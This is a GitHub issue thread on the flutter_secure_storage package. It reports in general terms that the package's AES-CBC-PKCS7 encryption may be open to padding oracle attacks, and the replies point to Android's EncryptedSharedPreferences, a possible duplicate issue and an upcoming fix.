flutter_secure_storage icon indicating copy to clipboard operation
flutter_secure_storage copied to clipboard

Published 20 hours ago verified publisher icon mogol

PKCS5 and PKCS7 are known to be vulnerable to oracle padding attacks

Open eikebartels opened this issue 2 years ago • 2 comments

This package seems to use AES-CBC-PKCS7 encryption for secure storage.

PKCS5 and PKCS7 are known to be vulnerable to oracle padding attacks in combination with CBC mode of operation. The issue occurs if an app reports failed encryption. By that, the plaintext can be restored piece by piece, as only byte-sized blocks are brute-forced.

Flutter seems to expose the EncrypredSharedPreferences of Android. They are the go-to solution. See https://pub.dev/packages/flutter_secure_storage and https://developer.android.com/reference/androidx/security/crypto/EncryptedSharedPreferences

eikebartels avatar Jul 14 '23 13:07 eikebartels

This package seems to use AES-CBC-PKCS7 encryption for secure storage.

PKCS5 and PKCS7 are known to be vulnerable to oracle padding attacks in combination with CBC mode of operation. The issue occurs if an app reports failed encryption. By that, the plaintext can be restored piece by piece, as only byte-sized blocks are brute-forced.

Flutter seems to expose the EncrypredSharedPreferences of Android. They are the go-to solution. See https://pub.dev/packages/flutter_secure_storage and https://developer.android.com/reference/androidx/security/crypto/EncryptedSharedPreferences

So this happens on Android as android is using EncrypredSharedPreferences

mkhtradm01 avatar Jul 15 '23 04:07 mkhtradm01

Possible duplicate of #526?

ernestomar avatar Aug 15 '23 14:08 ernestomar

Please read #769 for an upcoming fix for this issue.

juliansteenbakker avatar Aug 13 '24 20:08 juliansteenbakker